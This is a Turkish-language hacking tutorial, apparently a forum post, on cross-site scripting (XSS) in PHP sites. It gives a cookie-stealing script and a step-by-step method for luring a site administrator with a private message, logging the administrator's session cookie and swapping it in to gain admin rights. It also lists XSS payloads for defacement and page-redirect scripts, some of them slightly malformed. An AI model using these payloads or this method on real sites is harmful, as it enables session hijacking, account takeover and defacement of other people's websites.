XSS nedir ?
xss sistemlerdeki script açiklaridir...
ARama Modullerinde , Profil Panellerinde haber modullerinde shutbox vs.. bulunur..
bu modullere ufak scriptler ekleyerek sitenin yönlenmesini ya da hata vermesini saglariz..
örn :
[url]http://localhost/hedefdeneme/index.php?content=<h1>hebe hübele gibi[/url]
devam edelim...
Xss Hangi Sistemler Kullanilir..
Xss Genellikle Php-Nuke ya da Php ile yapilmis sistemlere kullanilir
ama Asp’de kullanilmaz anlamina gelmez..
Biraz daha örnekleyerek Anlatalim..
">nedirbu<"font%20size=20>Hacked by oturgaçli götüreç%20:P</font>
basit bir arama scriptinde kullanilicak açik..
Yukardaki Xss yi biraz daha açalim .
( $_POST / $_SESSION , $_GET ) Php de arama yaparken verdigimiz komut budur..
Session’da $username adli bir degisken var diyelim.Sayfada echo’landigi $_SESSION[’variable’] seklinde ekrana basilmadigi zaman url üzerinde sayfa.php?username=XSS girdigimizde oturumdaki kullaniciyi degil adres satirindan gelen variable’i ekrana basacaktir.
ama xss den verimli sonuç alabilmek için scrtiptin içinde java script çalistirmak gerekir...
Java Scripti Neden Çalistiririz :
Cookie Çalmak Için..
Örnekleyelim..
<script>document.location=’/xss/?’+escape(document.cookie)</script>
Adim Adim XSS için bir method anlatayim..
Ilk Önce Sitemize Cookie Çalicagimiz Script Yazilir...
daha Sonra Belirledigimiz sitenin adminine bir dikkat çekici bir pm atilarak Admin Bizim Belirledigimiz Siteye Yönlendirilir..
admin’inin Bilgisayarindaki Cookie’inn ayinsindan bizim belirtigimiz adrestedi script tarafindan log tutulur..
daha sonra bu cookie burdan alinir bizim bilgisayarimizdaki cookie ile degistirilir..
taskmanager.exe yi (xp için) kapatilir ve sitenin adresini tekrar yazip girdigimizi zaman sitede ki Kullanici Adimiz : Admin oldugunu tüm yetkilere sahip oldugumuzu görürüz..
Xss Komutlari :
<IMG src= "">ascript:alert(’Hacked by ...’);">
<IMG SRC=javascript:alert(’XSS’)>
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
<IMG DYNsrc= "javascript alert Hacked by..">
<BR SIZE="&{alert(’Hacked by...)}">
<IMG src= "vbscript msgboxHacked by..">
<DIV STYLE="background-image: url(javascript:alert(’Hacked by...))">
Sisteme JavaScript Ekleyerek Istedigimiz sayfaya yönlendirmek te Diger Bir Yöntemdir..
<script language="javascript">
self.location="gidilecek_sayfa.htm"
</script>
<script language="VBscript">
response.redirect""
</script>
<script>
window.location = "";
</script>
<script LANGUAGE="JavaScript">
<!-- Begin
function redirectPage() {
var url640x480 = "";
var url800x600 = "";
var url1024x768 ="";
if ((screen.width == 640) && (screen.height == 480))
window.location.href= url640x480;
else if ((screen.width == 800) && (screen.height == 600))
window.location.href= url800x600;
else if ((screen.width == 1024) && (screen.height == 76)
window.location.href= url1024x768;
else window.location.href= url640x480;
}
// End -->
</script>
<meta http-equiv="Refresh" content="1;URL=http://www.xxx.com/">
<script>
function sayfayi_yenile()
{self.location.refresh()}
self.setTimeOut(’sayfayi_yenile()’,5000)
</script>
<script>
window.setTimeout("location.reload()",10000);
</script>
<script>
location.reload();
</script>
Hazirlayan : Rawkmetal
